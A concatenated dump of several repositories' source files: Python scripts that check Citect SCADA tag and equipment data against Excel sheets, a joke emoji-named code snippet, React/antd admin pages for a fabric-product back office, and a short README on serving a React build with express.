# PageMenu.RDB and !Startup.RDB don't seem to map to pages in Citect
pages = list()
files = glob.glob(os.path.join(folder, 'MS*.rdb'))
for page in files:
# If the first character of the filename starts with an underscore don't add it to the list of pages
if os.path.basename(page)[0] == '_':
continue
if includePath:
pages.append(page)
else:
# print os.path.basename(page)
pages.append(os.path.basename(page))
return pages
# http://stackoverflow.com/a/17197027
def strings(filename, min=4):
import string
result = ""
with open(filename, "rb") as f:
for c in str(f.read()):
if c in string.printable:
result += c
continue
# if len(result) >= min:
# yield result
# result = ""
return result
# http://stackoverflow.com/a/600612
def mkdir_p(path):
import os, errno
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def getCachePage(pagePath):
mkdir_p('cache') # make the directory if it doesn't exist
cachefile = os.path.join('.', 'cache', os.path.basename(pagePath))
cachefile = os.path.abspath(cachefile)
# check if the page is already cached # if not cache it
# if not os.path.isfile(cachefile):
with open(cachefile, 'w+') as f:
for line in list(strings(pagePath)):
f.write(line)
# return the page
with open(cachefile) as f:
lines = f.readlines()
return ''.join(lines)
def isTagInPage(tag, pagePath):
# text = getCachePage(pagePath)
text = str(strings(pagePath))
return tag in text
if __name__ == '__main__':
folder = GetProjectDirectory()
# print getAlarms(folder)
# getTags(folder)
pages = listPages(folder)
tags = getTags(folder)
# page = "C:/Users/bjbourque/Desktop/citect_project_analyzer/SAPPI_FINAL_2008_BB\EQ_IFConv.RDB"
ms_tags_path = r'C:\Users\rangin\Desktop\MS_tags\ '
# print isTagInPage('IF401ORecvRetract', page)
for page in pages:
print("Tags on page '{0}'".format(os.path.basename(page)))
result = ""
with open(page, "rb") as f:
for c in str(f.read()):
if c in string.printable:
result += c
continue
file = open(ms_tags_path[:-1] + format(os.path.basename(page)) + r'.txt', 'w+')
for tag in tags:
if tag['NAME'] in result:
print(tag['NAME'])
file.write(tag['NAME'] + '\n')
# MS_tags_list[page.split('MS')[1][:2]] = temp_dict
file.close()
input("Press Enter to continue...")
# sys.exit(0)
# for page in pages:
# print page
# sys.exit(0)<file_sep>import pandas as pd
from dbfread import DBF
def readdbftolistofdict(name):
equip = DBF(name, encoding='cp1251', load=True)
outputlist = []
for record in equip:
recorddict = {}
for key, value in record.items():
recorddict[key] = value
if recorddict['IODEVICE'] == 'OFSDevice':
outputlist.append(recorddict)
return outputlist
# Формирование списка словарей equip, который содержит данные из ППО СКАДА
DBFFile = r'C:\ProgramData\Schneider Electric\Citect SCADA 2016\User\Current_20_03_16\equip.dbf'
equip = readdbftolistofdict(name=DBFFile)
dbfequip = pd.DataFrame(equip[0], index=[0])
for record in equip[1:]:
# print(record['NAME'])
dbfequip = dbfequip.append(record, ignore_index=True)
# Формирование DataFrame с данными из excel базы данных
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Старое\Бэкап от 29062020 Ревизия + WORK_10998_from 19дек 13-40+Сводная.xlsx'
df = pd.read_excel(inputfile, sheet_name='Лист1')
naimen_0 = df["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan'] # Убираем NaN
# Словари, ключи которых - название в базе Excel, а значение - название в базе ППО СКАДА, для составления соответствия между записями
type_aliases = {'AI': 'AI_udt',
'Сигн AI': 'AI_sign_udt',
'вентилятор': 'vent_udt',
'Клапан': 'Valve_udt',
'kid': 'Valve_kid_udt',
'AI_complicate': 'AI_cmp_udt',
'Signalizator': 'Sign_udt',
'Насос': 'Pump_udt',
'el_nagr': 'el_nagr_udt',
'flt_rulon': 'flt_rulon_udt',
'мешалка': 'mesh_udt',
'Шибер': 'shiber_udt'}
eu_aliases = {'Гр.С': 'Гр.С',
r'куб.м/ч': r'куб.м/ч',
'МПа': 'мПа',
'мПа': 'мПа',
'град.С': 'град.С',
'мм': 'мм',
r'М3/Ч': r'куб.м/час',
'NO_INF': 'отс инф',
'%': '%',
r'г/л': r'г/л',
'кПа': 'кПа',
'КПа': 'кПа',
'мм рт.ст': 'мм рт.ст.',
r'КГС/СМ2': r'КГС/СМ2',
'м': 'м',
r'м/с2': 'отс инф',
r'кг/ч': r'кг/ч',
r'л/ч': r'л/ч',
r'моль/л': r'моль/л',
'pH': 'pH',
r'мкСм/см': r'мкСм/см',
r'мг/куб.м': r'мг/куб.м',
r'мг/л': 'мг/л'}
object_name_flag = []
for name in naimen_0:
KIS = df.loc[df['Наименов_0'] == name]["Номер КИС к родителю"].values[0]
object_type = df.loc[df['Наименов_0'] == name]["Тип объекта"].values[0]
try:
KIS_equip = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM3"].values[0]
except IndexError:
print(f'В DBF отсутствует переменная {name}')
continue
object_type_equip = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["TYPE"].values[0]
if str(KIS)[3:].replace('.', '_') != KIS_equip:
print(f'Номер КИС к родителю и CUSTOM3 не совпадают для объекта {name}, Excel - {KIS}, DBF - {KIS_equip}')
try:
if type_aliases[str(object_type).strip()].lower() != object_type_equip.lower():
print(f'Тип объекта и TYPE не совпадают для объекта {name}, Excel - {object_type}, DBF - {object_type_equip}')
except KeyError:
pass
if object_type == 'AI' or object_type == 'Сигн AI':
object_name = name.split('_')[0]
if object_name in object_name_flag:
pass
else:
object_name_flag.append(object_name)
# Проверка правильности заполнения поля CUSTOM1 (Количество каналов сигнала)
quantity = sum(object_name in s for s in naimen_0)
custom1 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM1"].values[0]
if custom1 != '':
if custom1 != str(quantity):
print(f'Поле с количеством каналов в ППО СКАДА заполнено не верно для объекта {name}, - тип - {object_type}, CUSTOM1 - {custom1}, количество каналов объекта - {quantity}')
else:
print(f'Поле с количеством каналов в ППО СКАДА не заполнено для объекта {name}, тип - {object_type}, количество каналов объекта - {quantity}')
try:
custom6 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM6"].values[0]
custom7 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM7"].values[0]
custom8 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM8"].values[0]
scale_max = df.loc[df['Наименов_0'] == name][df['Тип сигнала'] == 'А']["верхний предел парам"].values[0]
scale_min = df.loc[df['Наименов_0'] == name][df['Тип сигнала'] == 'А']["нижн предел парам"].values[0]
eng_units = df.loc[df['Наименов_0'] == name][df['Тип сигнала'] == 'А']["Единицы измер параметра"].values[0]
if custom8 == 'КПа':
print(f'В объекте {name} изменить единицы измерения с "КПа" на "кПа"')
if custom8 == 'мПа':
print(f'В объекте {name} изменить единицы измерения с "мПа" на "МПа"')
if custom6 == '' or custom7 == '' or custom8 == '':
print(f'Незаполненные поля в ППО СКАДА для объекта {name} - CUSTOM6 = {custom6}, по базе - {scale_max}, CUSTOM7 = {custom7}, по базе - {scale_min}, CUSTOM8 = {custom8}, по базе - {eng_units}')
else:
# Проверка правильности заполнения поля CUSTOM6 (верхнее значение диапазона)
if str(scale_max) == 'отс инф':
print(f'Верхний предел параметра для объекта {name} не задано в базе Excel - {scale_max} , в ППО СКАДА - "{custom6}"')
else:
if str(scale_max).replace(',', '.') != str(custom6):
print(f'Верхний предел параметра для объекта {name} отличается в базе Excel - {scale_max} и в ППО СКАДА - "{custom6}"')
# Проверка правильности заполнения поля CUSTOM7 (нижнее значение диапазона)
if str(scale_min) == 'отс инф':
print(f'Нижний предел параметра для объекта {name} не задано в базе Excel - {scale_min} , в ППО СКАДА - "{custom7}"')
else:
if str(scale_min).replace(',', '.') != str(custom7):
print(f'Нижний предел параметра для объекта {name} отличается в базе Excel - {scale_min} и в ППО СКАДА - "{custom7}"')
# Проверка правильности заполнения поля CUSTOM8 (единицы измерения параметра)
if str(eng_units) == 'отс инф':
print(f'Единицы измерения для объекта {name} не задано в базе Excel - {eng_units} , в ППО СКАДА - {custom8}')
else:
if str(eng_units).lower() != eu_aliases[str(custom8)].lower():
print(f'Единицы измерения для объекта {name} отличается в базе Excel - {eng_units} и в ППО СКАДА - {custom8}')
except IndexError:
print(f'В объекте {name} типа {object_type} отсутствует аналоговый сигнал')
<file_sep>import glob
import os
import pandas as pd
import numpy as np
inputfile = r'C:\Users\rangin\Desktop\MS_objects\Сводная по мнемосхемам.xlsx'
objfile = r'C:\Users\rangin\Desktop\MS_objects\ '
df = pd.read_excel(inputfile, sheet_name='Данные')
df['MS_fact'] = ''
naimen_0 = df["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan'] # Убираем NaN
files = glob.glob(os.path.join(objfile[:-1], '*.txt'))
for file in files:
f = open(file, 'r')
f1 = f.readlines()
for i in range(0, len(f1)):
f1[i] = f1[i].replace('\n', '')
for row in f1:
df["MS_fact"] = np.where(df['Наименов_0'] == row, df["MS_fact"] + format(os.path.basename(file))[:4], df["MS_fact"])
f.close()
for name in naimen_0:
ms_fact = str(df.loc[df['Наименов_0'] == name]["MS_fact"].values[0]).replace('MS', '')
m = ''
for slice in [ms_fact[i:i+2] for i in range(0, len(ms_fact), 2)]:
m = m + slice + '+'
mnem = str(df.loc[df['Наименов_0'] == name]["MS"].values[0]).replace('МС', '').replace('MC', '').replace('nan', '')
ms_fact = m
if mnem not in ms_fact:
if ms_fact == '':
print(f'Объект {name} по сводной таблице мнемосхем находится на МС{mnem}, по факту не привязан ({ms_fact})')
else:
if mnem == '':
print(f'Объект {name} по сводной таблице мнемосхем не привязан к мнемосхема ({mnem}), по факту привязан в {ms_fact}')
else:
print(f'В объекте {name} мнемосхема по таблице {mnem} и по факту {ms_fact} отличается ')
| 0bc5644f8da93f3ef671671d88b467e939c8bebe | [
"Python"
] | 17 | Python | amaralex1/Citect_SCADA_utiliities | 0388793e84c4add7b20119bbd6f4e40d7371cd6b | 95db89b5c070b4abd2631927454ee36f2ccd9b85 |
refs/heads/master | <file_sep>#!/usr/bin/env python
# -*- coding: utf-8 -*-
class 🍙🍙🍙{
func 🐶🐶(😇:Int, 😙: Int){
return 😙 + 😇
}
}
var 🍜 = 3
var 🍝 = 🍜 + 5
var 🍙 = 🍙🍙🍙()
println(🍙.🐶🐶(🍜, 😙:🍝 )) | 3dfc258daee4f6f978aaeca20574a55dd4afa2b4 | [
"Python"
] | 1 | Python | maruhachi/emoji-code | bb4edac0084430646723e0c7f7b9a5688beff61a | 9e337f4beab7a5b0d14950c68d6c75d4b23912bf |
refs/heads/master | <file_sep>import React from 'react';
import { Route, Switch, BrowserRouter as Router } from 'react-router-dom';
import AuthComponent from './component/AuthComponent';
// import AuthRoute from './component/AuthRoute';
import Login from './container/Login';
import Main from './layout/Main';
const NoMatch = (props) => (
<div>nomatch</div>
)
export default class Routes extends React.Component {
render() {
return (
<Router>
<Switch>
<Route path="/login" component={Login} />
<AuthComponent path="/" redirectPath="/login" component={Main} noMatch={NoMatch} />
{/* <Route render={() => <AuthRoute Layout={Main} />} /> */}
</Switch>
</Router>
);
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Form, Input, Select, Button, message } from 'antd';
import EnhanceTitle from '../../component/EnhanceTitle';
import { formItemLayout2, SKY_TYPE } from '../../utils/constant';
import { getSkylightById, updateSkylight } from '../../action/skylight';
import Uploader from '../../component/Uploader';
const FormItem = Form.Item;
const { Option } = Select;
const { TextArea } = Input;
@connect(({ skylight }) => ({
skylightDetail: skylight.skylightDetail
}), {
getSkylightById
})
@Form.create()
export default class SkylightEdit extends React.PureComponent {
componentDidMount() {
const { match } = this.props;
const { params: { id } } = match;
this.props.getSkylightById(id);
}
handleSubmit= (e) => {
e.preventDefault();
this.props.form.validateFields(async (err, values) => {
if (!err) {
const { match } = this.props;
const { params: { id } } = match;
const result = await updateSkylight({ id, ...values });
if (result && result.code === 0) {
message.success('更新天窗成功!1s后跳转天窗列表页面');
this.timer = setTimeout(() => {
this.props.history.push('/skylight/list');
}, 1000)
}
}
});
}
render() {
const { getFieldDecorator } = this.props.form;
const { skylightDetail = {} } = this.props;
return (
<div className="page-detail">
<Form onSubmit={this.handleSubmit}>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<FormItem {...formItemLayout2} label="天窗ID">
{getFieldDecorator('skyId', {
initialValue: skylightDetail.skyId,
rules: [{
required: true, message: '请输入天窗ID',
}],
})(
<Input placeholder="请输入天窗ID" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗类型">
{getFieldDecorator('skyType', {
initialValue: skylightDetail.skyType,
rules: [{
required: true, message: '请选择天窗类型',
}],
})(
<Select allowClear placeholder="请选择天窗类型">
{Object.keys(SKY_TYPE).map(item => (
<Option key={item} value={item}>{SKY_TYPE[item]}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗标题">
{getFieldDecorator('skyTitle', {
initialValue: skylightDetail.skyTitle,
rules: [{
required: true, message: '请输入天窗标题',
}],
})(
<Input placeholder="请输入天窗标题" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗描述">
{getFieldDecorator('description', {
initialValue: skylightDetail.description,
rules: [{
required: true, message: '请输入天窗描述',
}],
})(
<TextArea rows={4} placeholder="请输入天窗描述" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗图片">
{getFieldDecorator('skyContent', {
initialValue: [skylightDetail.skyContent],
rules: [{
required: true, message: '请添加天窗图片',
}],
})(
<Uploader type="banner" max={1} />
)}
</FormItem>
</Card>
<div>
<Button style={{ width: '120px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button style={{ width: '120px' }}>清空</Button>
</div>
</Form>
</div>
)
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Layout, Menu, Icon, Breadcrumb, message, Dropdown, Avatar } from 'antd';
import { Route, Link, Redirect } from 'react-router-dom';
import { authUserLogin, authUserLogout, getUserInfo } from '../action/auth';
import MenuData from '../common/menu';
import routerData from '../common/router';
import './index.css';
const { Header, Content, Footer, Sider } = Layout;
const SubMenu = Menu.SubMenu;
const breadcrumbNameMap = {};
Object.keys(routerData).forEach(item => {
breadcrumbNameMap[item] = routerData[item].name
});
const redirectData = Object.keys(routerData).filter(item => routerData[item].redirect);
function getFirstChildPath(parentPath) {
const currentMenu = MenuData.find(item => item.path === parentPath);
if (currentMenu) {
const childpath = currentMenu.children[0].path;
return `/${parentPath}/${childpath}`;
} else {
return `/${parentPath}`;
}
}
let menuPaths = [];
MenuData.forEach(parent => {
if (parent.children) {
parent.children.forEach(child => {
menuPaths.push(`/${parent.path}/${child.path}`)
})
}
});
@connect(({ auth }) => ({
userInfo: auth.userInfo,
}), {
authUserLogin,
authUserLogout,
getUserInfo,
})
export default class Main extends React.PureComponent {
state = {
collapsed: false,
selectedKeys: '1',
openKeys: [],
openChangeKes: []
};
async componentDidMount() {
await this.props.getUserInfo();
}
toggle = () => {
this.setState({
collapsed: !this.state.collapsed,
});
}
onMenuClick = async ({ key }) => {
const { history } = this.props;
if (key === 'logout') {
try {
const resp = await this.props.authUserLogout();
if (resp) {
history.push('/login');
}
} catch (error) {
message.error(error.msg);
}
} else if (key === 'reset') {
history.push('/admin/reset');
}
};
render() {
const { history, location } = this.props;
let selectedKeys = [location.pathname];
if (!menuPaths.includes(location.pathname)) {
selectedKeys = [getFirstChildPath(location.pathname.split('/')[1])];
}
const pathSnippet = location.pathname.split('/')[1];
const childPath = getFirstChildPath(pathSnippet);
const { collapsed } = this.state;
const pathSnippets = location.pathname.split('/').filter(i => i);
// 去除没有url匹配的
const treatedPathSnippets = pathSnippets.filter((_, index) => {
const url = `/${pathSnippets.slice(0, index + 1).join('/')}`;
return breadcrumbNameMap[url];
});
const extraBreadcrumbItems = treatedPathSnippets.map((_, index) => {
const url = `/${pathSnippets.slice(0, index + 1).join('/')}`;
return (
<Breadcrumb.Item key={url}>
{
treatedPathSnippets.length === index + 1 ? (
<span>{breadcrumbNameMap[url]}</span>
) : (
<Link to={url}>{breadcrumbNameMap[url]}</Link>
)
}
</Breadcrumb.Item>
);
});
const breadcrumbItems = [(
<Breadcrumb.Item key="home">
<Link to="/">首页</Link>
</Breadcrumb.Item>
)].concat(extraBreadcrumbItems);
const menu = (
<Menu onClick={this.onMenuClick} className="menu" placement="bottomRight">
{/* <Menu.Item><Icon type="user" />个人中心</Menu.Item>
<Menu.Item><Icon type="setting" />设置</Menu.Item> */}
<Menu.Divider />
<Menu.Item key="logout"><Icon type="logout" />退出登录</Menu.Item>
<Menu.Item key="reset"><Icon type="setting" />修改密码</Menu.Item>
</Menu>
);
const { userInfo = {} } = this.props;
const { sysUser = {} } = userInfo;
return (
<Layout className="main-layout" style={{ minHeight: '100vh' }}>
<Sider
trigger={null}
collapsible
collapsed={collapsed}
>
<div className="logo">
<Icon type="appstore" theme="outlined" />
<span>快易布管理系统</span>
</div>
<Menu theme="dark" defaultOpenKeys={[pathSnippet]} selectedKeys={selectedKeys} mode="inline">
{
MenuData.map(item => (
<SubMenu
key={item.path}
title={<span><Icon type={item.icon} /><span>{item.name}</span></span>}
onTitleClick={this.onTitleClick}
>
{
item.children.map(child => (
<Menu.Item key={`/${item.path}/${child.path}`} onClick={() => history.push(`/${item.path}/${child.path}`)}>{child.name}</Menu.Item>
))
}
</SubMenu>
))
}
</Menu>
</Sider>
<Layout>
<Header className="top-header">
<Icon
className="trigger"
type={this.state.collapsed ? 'menu-unfold' : 'menu-fold'}
onClick={this.toggle}
/>
<div className="user-drop">
<Dropdown overlay={menu}>
<span className="action account">
<Avatar size="small" src="https://gw.alipayobjects.com/zos/rmsportal/BiazfanxmamNRoxxVxka.png" />
<span className="username">{sysUser.username}</span>
</span>
</Dropdown>
</div>
</Header>
<Content>
<Breadcrumb style={{ margin: '0 0px 16px 0', background: '#ffffff', padding: '8px 16px' }}>
{breadcrumbItems}
</Breadcrumb>
<div style={{ margin: '0 16px' }}>
{redirectData.includes(location.pathname) && <Redirect from={pathSnippet} to={childPath} />}
{
Object.keys(routerData).map(item => (
<Route key={item} exact={routerData[item].exact} path={item} component={routerData[item].component} />
))
}
</div>
</Content>
<Footer style={{ textAlign: 'center' }}>
备案号:粤ICP备18103794号-1
</Footer>
</Layout>
</Layout>
);
}
}
<file_sep>import React from 'react';
import { Form, Input, Select, Button } from 'antd';
import { UNIT_VALUES } from '../../utils/constant';
const FormItem = Form.Item;
const Option = Select.Option;
const formItemLayout = {
labelCol: {
xs: { span: 24 },
sm: { span: 6 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 18 },
},
};
@Form.create()
export default class PriceForm extends React.PureComponent {
handleSubmit = (e) => {
e.preventDefault();
this.props.form.validateFields(async(err, values) => {
if (!err) {
this.props.addBatch(values)
this.setState({ loading: false });
this.handleReset();
} else {
this.setState({ loading: false });
}
});
}
handleNum2Change = (e) => {
const value = e.target.value;
this.props.form.setFieldsValue({
num3: parseInt(value, 10) + 1 || undefined,
});
}
handleNum4Change = (e) => {
const value = e.target.value;
this.props.form.setFieldsValue({
num5: parseInt(value, 10) + 1 || undefined,
});
}
handleReset = () => {
this.props.form.resetFields();
}
render() {
const { getFieldDecorator } = this.props.form;
return (
<Form onSubmit={this.handleSubmit}>
<FormItem {...formItemLayout} label="计价单位">
{getFieldDecorator('unit', {
initialValue: '0',
rules: [{
required: true, message: '请选择计价单位',
}],
})(
<Select>
{Object.keys(UNIT_VALUES).map(item => (
<Option key={item} value={item}>{UNIT_VALUES[item]}</Option>
))}
</Select>
)}
</FormItem>
<FormItem required {...formItemLayout} label="产品价格">
<table className="priceform-table">
<thead>
<tr>
<th>数量</th>
<th>价格</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('num1', {
initialValue: 1,
})(
<Input style={{ width: 60 }} />
)}
</FormItem>
<span style={{ padding: '0 15px' }}>至</span>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('num2')(
<Input style={{ width: 60 }} onChange={this.handleNum2Change} />
)}
</FormItem>
</td>
<td>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('price1')(
<Input style={{ width: 60 }} />
)}
</FormItem>
</td>
</tr>
<tr>
<td>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('num3')(
<Input style={{ width: 60 }} />
)}
</FormItem>
<span style={{ padding: '0 15px' }}>至</span>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('num4')(
<Input style={{ width: 60 }} onChange={this.handleNum4Change} />
)}
</FormItem>
</td>
<td>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('price2')(
<Input style={{ width: 60 }} />
)}
</FormItem>
</td>
</tr>
<tr>
<td>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('num5')(
<Input style={{ width: 60 }} />
)}
</FormItem>
<span style={{ padding: '0 15px' }}>至</span>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('num6', {
initialValue: 'max',
})(
<Input style={{ width: 60 }} />
)}
</FormItem>
</td>
<td>
<FormItem style={{ display: 'inline-block' }}>
{getFieldDecorator('price3')(
<Input style={{ width: 60 }} />
)}
</FormItem>
</td>
</tr>
</tbody>
</table>
</FormItem>
<FormItem {...formItemLayout}>
<Button style={{ width: '120px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button onClick={this.handleReset} style={{ width: '120px' }}>清空</Button>
</FormItem>
</Form>
)
}
}
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import { Card, Form, Input, Select, Button, message } from 'antd';
import EnhanceTitle from '../../component/EnhanceTitle';
import Uploader from '../../component/Uploader';
import { addProduct } from '../../action/product';
import { getSystemDicts } from '../../action/system';
import { getProductTypes } from '../../action/productType';
import { formItemLayout2, SUPPLY_STATUS } from '../../utils/constant';
const FormItem = Form.Item;
const Option = Select.Option;
@Form.create()
export default class ProductAdd extends React.PureComponent {
state = {
productCategory: [],
productSubcategory: [],
colour: [],
}
async componentDidMount() {
const productCategory = getSystemDicts({ parentLabel: 'productCategory' });
this.setState({ productCategory: await productCategory });
const colour = getSystemDicts({ parentLabel: 'colour' });
this.setState({ colour: await colour });
}
handleSubmit= (e) => {
e.preventDefault();
this.props.form.validateFields(async (err, values) => {
if (!err) {
const { mainPicture, detailPicture, ...params } = values;
const pic = mainPicture[0];
const detailPic = detailPicture.join(',');
const result = await addProduct({ ...params, mainPicture: pic, detailPicture: detailPic });
if (result && result.code === 0) {
message.success('添加产品成功!,你可以继续添加产品,或者点击返回到列表页面');
} else {
message.error('添加产品失败,请稍后重试!');
}
}
});
}
handleReset = () => {
this.props.form.resetFields();
}
handleCateChange = async (value) => {
this.props.form.setFieldsValue({ productSubcategory: undefined });
if (value) {
const result = await getProductTypes({ parentLabel: value });
this.setState({ productSubcategory: result });
}
}
render() {
const { getFieldDecorator } = this.props.form;
const { productCategory, productSubcategory, colour } = this.state;
return (
<div className="page-detail">
<Form onSubmit={this.handleSubmit}>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<FormItem {...formItemLayout2} label="产品名称">
{getFieldDecorator('name', {
rules: [{
required: true, message: '请输入产品名称',
}],
})(
<Input placeholder="请输入产品名称" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品货号">
{getFieldDecorator('sameStyleNum', {
rules: [{
required: true, message: '请输入产品货号',
}],
})(
<Input placeholder="请输入产品货号" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品大类">
{getFieldDecorator('productCategory', {
rules: [{
required: true, message: '请选择产品大类',
}],
})(
<Select onChange={this.handleCateChange} allowClear placeholder="请选择产品大类">
{productCategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品子类">
{getFieldDecorator('productSubcategory', {
rules: [{
required: true, message: '请选择产品子类',
}],
})(
<Select placeholder="请选择产品子类">
{productSubcategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
<EnhanceTitle title="详情信息" />
<FormItem {...formItemLayout2} label="颜色">
{getFieldDecorator('colour', {
rules: [{
required: true, message: '请选择产品颜色',
}],
})(
<Select allowClear placeholder="请选择产品颜色">
{colour.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品主图">
{getFieldDecorator('mainPicture', {
rules: [{
required: true, message: '请添加产品主图',
}],
})(
<Uploader max={1}/>
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品详情图">
{getFieldDecorator('detailPicture', {
rules: [{
required: true, message: '请添加产品详情图',
}],
})(
<Uploader placeholder="请输入产品名称" max={5} />
)}
</FormItem>
<FormItem {...formItemLayout2} label="成分">
{getFieldDecorator('ingredient', {
rules: [{
required: true, message: '请输入产品成分',
}],
})(
<Input placeholder="请输入产品成分" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="克重">
{getFieldDecorator('weight', {
rules: [{
required: true, message: '请输入产品克重',
}],
})(
<Input placeholder="请输入产品克重" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="门幅">
{getFieldDecorator('size', {
rules: [{
required: true, message: '请输入产品门幅',
}, {
pattern: /^[0-9.]+$/g, message: '请输入数字'
}],
})(
<Input addonAfter="厘米" placeholder="请输入产品门幅" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="产品用途">
{getFieldDecorator('use', {
rules: [{
required: true, message: '请输入产品用途',
}],
})(
<Input placeholder="请输入产品用途" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="加工工艺">
{getFieldDecorator('craft', {
rules: [{
required: true, message: '请输入产品加工工艺',
}],
})(
<Input placeholder="请输入产品加工工艺" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="供应状态">
{getFieldDecorator('supplyStatus', {
rules: [{
required: true, message: '请选择产品供应状态',
}],
})(
<Select allowClear placeholder="请选择产品供应状态">
{Object.keys(SUPPLY_STATUS).map(item => (
<Option key={item} value={item}>{SUPPLY_STATUS[item]}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="发货地点">
{getFieldDecorator('pointOfDeparture', {
rules: [{
required: true, message: '请输入产品发货地点',
}],
})(
<Input placeholder="请输入产品发货地点" />
)}
</FormItem>
</Card>
<div>
<Button style={{ width: '100px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button onClick={this.handleReset} style={{ width: '100px', marginRight: '20px' }}>清空</Button>
<Button style={{ width: '100px' }}>
<Link to="/product/list">返回</Link>
</Button>
</div>
</Form>
</div>
)
}
}
<file_sep>import React from 'react';
import { formatDateSecond, formatYuan } from '../../../utils/utils';
import { nullString, PRODUCT_TYPE, PRODUCT_SUB, PRODUCT_STATUS } from '../../../utils/constant';
const color = {
1: '红色',
2: '黑色',
3: '蓝色',
}
const columns = [
{
title: '产品名称',
dataIndex: 'name',
key: 'name',
align: 'center',
fixed: 'left',
},
{
title: '产品货号',
dataIndex: 'sameStyleNum',
key: 'sameStyleNum',
align: 'center',
},
{
title: '产品大类',
dataIndex: 'productCategory',
key: 'productCategory',
align: 'center',
render: (text) => text ? PRODUCT_TYPE[text] : nullString
},
{
title: '产品子类',
dataIndex: 'productSubcategory',
key: 'productSubcategory',
align: 'center',
render: (text) => text ? PRODUCT_SUB[text] : nullString
},
{
title: '产品图片',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
},
{
title: '价格(元)',
dataIndex: 'productPrice',
key: 'productPrice',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return formatYuan(product['price']) || nullString
}
},
{
title: '计价单位',
dataIndex: 'unit',
key: 'unit',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return product['unit'] || nullString
}
},
{
title: '颜色',
dataIndex: 'colour',
key: 'colour',
align: 'center',
render: (text) => color[text] || nullString
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
width: '14%',
render: (text) => text ? formatDateSecond(text) : nullString
},
{
title: '状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => text ? PRODUCT_STATUS[text] : '待上架'
},
];
export default columns;
<file_sep>import React from 'react';
const columns = [
{
title: '产品图片',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
render: (text, record) => <img width="30" height="30" src={record.product.mainPicture} alt="产品图片" />
},
{
title: '产品名称',
dataIndex: 'name',
key: 'name',
align: 'center',
render: (text, record) => record.product.name,
},
{
title: '价格(元)',
dataIndex: 'price',
key: 'price',
align: 'center',
render: text => text / 100,
},
{
title: '计价单位',
dataIndex: 'unit',
key: 'unit',
align: 'center',
render: (text, record) => record.product.unit,
},
{
title: '颜色',
dataIndex: 'colour',
key: 'colour',
align: 'center',
render: (text, record) => record.product.colour,
},
{
title: '数量',
dataIndex: 'quantity',
key: 'quantity',
align: 'center',
},
{
title: '小计(元)',
dataIndex: 'total',
key: 'total',
align: 'center',
render: (text, record) => record.price * record.quantity / 100,
}
];
export default columns;
<file_sep>import { combineReducers } from 'redux';
import auth from './auth';
import user from './user';
import product from './product';
import order from './order';
import agent from './agent';
import skylight from './skylight';
import system from './system';
import productType from './productType';
const rootReducer = combineReducers({
auth,
user,
product,
order,
agent,
skylight,
system,
productType,
});
export default rootReducer;
<file_sep>### 搭建react打包后的app.js的后台服务
- `express`启动后台服务
- `connect-history-api-fallback`解决服务启动后页面刷新的404问题
- `http-proxy`解决接口api的代理问题,用`prependPath`解决path的rewrite需求
- `express.static`设置打包后的`build`文件夹作为静态资源库
- `babel-register`解决node兼任es6语法启动问题
### pm2的使用
